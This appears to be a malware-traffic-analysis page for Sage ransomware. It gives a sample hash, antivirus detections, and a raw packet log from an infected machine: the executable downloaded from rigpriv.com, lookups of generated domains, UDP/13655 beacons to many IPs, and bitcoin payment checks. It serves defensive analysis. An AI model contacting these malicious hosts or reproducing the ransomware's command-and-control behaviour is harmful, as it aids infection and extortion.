Sage Ransomware 2lm5xNQU.exe 211.114.4.45 UDP/13655 PCAP file download Malware Traffic Analysis

Download Attachments

  • 1 pcap 21m5
    Date added: May 21, 2017 9:33 pm Added by: admin File size: 13 MB Downloads: 78
SHA256: 01fd9a6245c93f25ec2202d06bb40dbdcb5a3c1a0e5fb3db54c4d6253f9f7f4c
File name: 2lm5xNQU.exe
Detection ratio: 52 / 61
Analysis date: 2017-05-21 21:29:52 UTC ( 0 minutes ago )
Ad-Aware Gen:Variant.Ransom.Sage.110 20170521
AegisLab Gen.Variant.Ransom!c 20170521
AhnLab-V3 Trojan/Win32.SageCrypt.R196517 20170521
ALYac Trojan.Ransom.Sage 20170520
Antiy-AVL Trojan/Win32.TSGeneric 20170521
Arcabit Trojan.Ransom.Sage.110 20170521
Avast Win32:Malware-gen 20170521
AVG Ransom_r.BRQ 20170521
Avira (no cloud) TR/Agent.bkkbc 20170521
AVware Trojan.Win32.Generic!BT 20170521
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170503
BitDefender Gen:Variant.Ransom.Sage.110 20170521

2017-05-21 15:59:43.097424 IP 192.168.1.102.55377 > 104.24.122.74.80: Flags [P.], seq 0:404, ack 1, win 256, length 404: HTTP: GET /upload/2lm5xNQU.exe HTTP/1.1
E…J(@…
….fh.zJ.Q.Pmj..z..    P…/…GET /upload/2lm5xNQU.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: rigpriv.com
Connection: Keep-Alive

2017-05-21 15:59:51.493214 IP 192.168.1.102.62487 > 75.75.75.75.53: 11787+ A? mbfce24rgn65bx3g.2kzm0f.com. (45)
E..I”……J…fKKKK…5.53…………..mbfce24rgn65bx3g.2kzm0f.com…..
2017-05-21 15:59:51.534744 IP 192.168.1.102.62488 > 75.75.75.75.53: 12566+ A? mbfce24rgn65bx3g.6t4u2p.net. (45)
E..I”……I…fKKKK…5.5z.1…………mbfce24rgn65bx3g.6t4u2p.net…..

2017-05-21 15:59:51.607060 IP 192.168.1.102.62489 > 211.114.4.45.13655: UDP, length 168
2017-05-21 15:59:51.607141 IP 192.168.1.102.62489 > 138.197.53.223.13655: UDP, length 168
2017-05-21 15:59:51.607195 IP 192.168.1.102.62489 > 211.114.186.119.13655: UDP, length 168
2017-05-21 15:59:51.607248 IP 192.168.1.102.62489 > 211.114.35.219.13655: UDP, length 168
2017-05-21 15:59:51.607300 IP 192.168.1.102.62489 > 211.114.128.4.13655: UDP, length 168
2017-05-21 15:59:51.607353 IP 192.168.1.102.62489 > 5.45.86.15.13655: UDP, length 168
2017-05-21 15:59:51.607403 IP 192.168.1.102.62489 > 5.45.111.91.13655: UDP, length 168
2017-05-21 15:59:51.607442 IP 192.168.1.102.62489 > 138.197.92.93.13655: UDP, length 168
2017-05-21 15:59:51.607503 IP 192.168.1.102.62489 > 5.45.173.171.13655: UDP, length 168
2017-05-21 15:59:51.607555 IP 192.168.1.102.62489 > 138.197.50.41.13655: UDP, length 168
2017-05-21 15:59:51.607606 IP 192.168.1.102.62489 > 5.45.27.108.13655: UDP, length 168
2017-05-21 15:59:51.607656 IP 192.168.1.102.62489 > 211.114.88.146.13655: UDP, length 168
2017-05-21 15:59:51.607707 IP 192.168.1.102.62489 > 138.197.249.221.13655: UDP, length 168
2017-05-21 15:59:51.607757 IP 192.168.1.102.62489 > 139.59.46.106.13655: UDP, length 168
2017-05-21 15:59:51.607809 IP 192.168.1.102.62489 > 5.45.199.75.13655: UDP, length 168
2017-05-21 15:59:51.607859 IP 192.168.1.102.62489 > 138.197.148.95.13655: UDP, length 168
2017-05-21 15:59:51.607934 IP 192.168.1.102.62489 > 138.197.69.39.13655: UDP, length 168
2017-05-21 15:59:51.607985 IP 192.168.1.102.62489 > 5.45.138.5.13655: UDP, length 168
2017-05-21 15:59:51.608035 IP 192.168.1.102.62489 > 138.197.243.44.13655: UDP, length 168
2017-05-21 15:59:51.608085 IP 192.168.1.102.62489 > 138.197.16.154.13655: UDP, length 168
2017-05-21 15:59:51.608136 IP 192.168.1.102.62489 > 5.45.17.36.13655: UDP, length 168
2017-05-21 15:59:51.608185 IP 192.168.1.102.62489 > 211.114.38.24.13655: UDP, length 168
2017-05-21 15:59:51.608237 IP 192.168.1.102.62489 > 139.59.63.179.13655: UDP, length 168
2017-05-21 15:59:51.608288 IP 192.168.1.102.62489 > 139.59.172.69.13655: UDP, length 168
2017-05-21 15:59:51.608338 IP 192.168.1.102.62489 > 5.45.2.69.13655: UDP, length 168
2017-05-21 15:59:51.608388 IP 192.168.1.102.62489 > 138.197.171.187.13655: UDP, length 168
2017-05-21 15:59:51.608438 IP 192.168.1.102.62489 > 5.45.168.29.13655: UDP, length 168
2017-05-21 15:59:51.608488 IP 192.168.1.102.62489 > 138.197.9.146.13655: UDP, length 168
2017-05-21 15:59:51.608538 IP 192.168.1.102.62489 > 5.45.62.33.13655: UDP, length 168
2017-05-21 15:59:51.608588 IP 192.168.1.102.62489 > 5.45.151.81.13655: UDP, length 168
2017-05-21 15:59:51.608638 IP 192.168.1.102.62489 > 139.59.228.94.13655: UDP, length 168
2017-05-21 15:59:51.608689 IP 192.168.1.102.62489 > 138.197.149.178.13655: UDP, length 168
2017-05-21 15:59:51.608746 IP 192.168.1.102.62489 > 5.45.154.15.13655: UDP, length 168
2017-05-21 15:59:51.608805 IP 192.168.1.102.62489 > 211.114.131.201.13655: UDP, length 168
2017-05-21 15:59:51.608855 IP 192.168.1.102.62489 > 138.197.96.60.13655: UDP, length 168
2017-05-21 15:59:51.608905 IP 192.168.1.102.62489 > 5.45.33.223.13655: UDP, length 168
2017-05-21 15:59:51.608958 IP 192.168.1.102.62489 > 139.59.54.221.13655: UDP, length 168
2017-05-21 15:59:51.609008 IP 192.168.1.102.62489 > 139.59.207.207.13655: UDP, length 168
2017-05-21 15:59:51.609058 IP 192.168.1.102.62489 > 5.45.60.130.13655: UDP, length 168
2017-05-21 15:59:51.609111 IP 192.168.1.102.62489 > 139.59.13.3.13655: UDP, length 168
2017-05-21 15:59:51.609161 IP 192.168.1.102.62489 > 5.45.18.85.13655: UDP, length 168
2017-05-21 15:59:51.609211 IP 192.168.1.102.62489 > 138.197.123.231.13655: UDP, length 168
2017-05-21 15:59:51.609261 IP 192.168.1.102.62489 > 211.114.56.29.13655: UDP, length 168
2017-05-21 15:59:51.609311 IP 192.168.1.102.62489 > 211.114.89.107.13655: UDP, length 168
2017-05-21 15:59:51.609313 IP 192.168.1.102.62489 > 139.59.14.44.13655: UDP, length 168
2017-05-21 15:59:51.609412 IP 192.168.1.102.62489 > 139.59.39.156.13655: UDP, length 168
2017-05-21 15:59:51.609461 IP 192.168.1.102.62489 > 211.114.116.17.13655: UDP, length 168
2017-05-21 15:59:51.609511 IP 192.168.1.102.62489 > 211.114.165.130.13655: UDP, length 168
2017-05-21 15:59:51.609561 IP 192.168.1.102.62489 > 138.197.106.102.13655: UDP, length 168

2017-05-21 16:02:08.958333 IP 192.168.1.102.57831 > 75.75.75.75.53: 3648+ A? 7gie6ffnkrjykggd.2kzm0f.com. (45)
2017-05-21 16:02:16.440909 IP 192.168.1.102.57832 > 75.75.75.75.53: 19803+ A? 7gie6ffnkrjykggd.6t4u2p.net. (45)
2017-05-21 16:02:16.443659 IP 192.168.1.102.57833 > 75.75.75.75.53: 15121+ A? 7gie6ffnkrjykggd.6t4u2p.net. (45)
2017-05-21 16:02:22.417162 IP 192.168.1.102.57834 > 75.75.75.75.53: 31003+ A? btc.blockr.io. (31)
2017-05-21 16:02:54.976371 IP 192.168.1.102.57835 > 75.75.75.75.53: 35937+ A? 7gie6ffnkrjykggd.xcvkjet.net. (46)
2017-05-21 16:02:59.001852 IP 192.168.1.102.57836 > 75.75.75.75.53: 17942+ A? 7gie6ffnkrjykggd.onion. (40)

2017-05-21 16:02:22.575024 IP 192.168.1.102.55449 > 104.16.150.172.80: Flags [P.], seq 3986130788:3986131109, ack 3679392996, win 256, length 321: HTTP: GET /api/v1/address/txs/1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7?_=1495396820544 HTTP/1.1
E..i`.@……..fh……P…d.O..P…….GET /api/v1/address/txs/1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7?_=1495396820544 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: btc.blockr.io
Connection: Keep-Alive

2017-05-21 16:02:26.753866 IP 192.168.1.102.55449 > 104.16.150.172.80: Flags [P.], seq 321:730, ack 994, win 252, length 409: HTTP: GET /api/v1/tx/info/04a47ecab9ebfe44f3a35a5e8e6db53fa8b384569164887253d848e30eb43338?_=1495396824927 HTTP/1.1
E…`.@……..fh……P…..O..P…….GET /api/v1/tx/info/04a47ecab9ebfe44f3a35a5e8e6db53fa8b384569164887253d848e30eb43338?_=1495396824927 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: btc.blockr.io
Connection: Keep-Alive
Cookie: __cfduid=dd4bbc41b4b92668e8a831a116dc12fb51495396823

2017-05-21 16:02:52.524435 IP 192.168.1.102.55449 > 104.16.150.172.80: Flags [P.], seq 730:1113, ack 1978, win 256, length 383: HTTP: GET /api/v1/address/txs/1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7?_=1495396850683 HTTP/1.1
E…`.@……..fh……P…>.O..P…J<..GET /api/v1/address/txs/1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7?_=1495396850683 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: btc.blockr.io
Connection: Keep-Alive
Cookie: __cfduid=dd4bbc41b4b92668e8a831a116dc12fb51495396823

2017-05-21 16:02:54.064172 IP 192.168.1.102.55449 > 104.16.150.172.80: Flags [P.], seq 1113:1522, ack 2831, win 253, length 409: HTTP: GET /api/v1/tx/info/04a47ecab9ebfe44f3a35a5e8e6db53fa8b384569164887253d848e30eb43338?_=1495396852243 HTTP/1.1
E…`.@……..fh……P…..O..P…….GET /api/v1/tx/info/04a47ecab9ebfe44f3a35a5e8e6db53fa8b384569164887253d848e30eb43338?_=1495396852243 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: btc.blockr.io
Connection: Keep-Alive
Cookie: __cfduid=dd4bbc41b4b92668e8a831a116dc12fb51495396823

 

Leave a Reply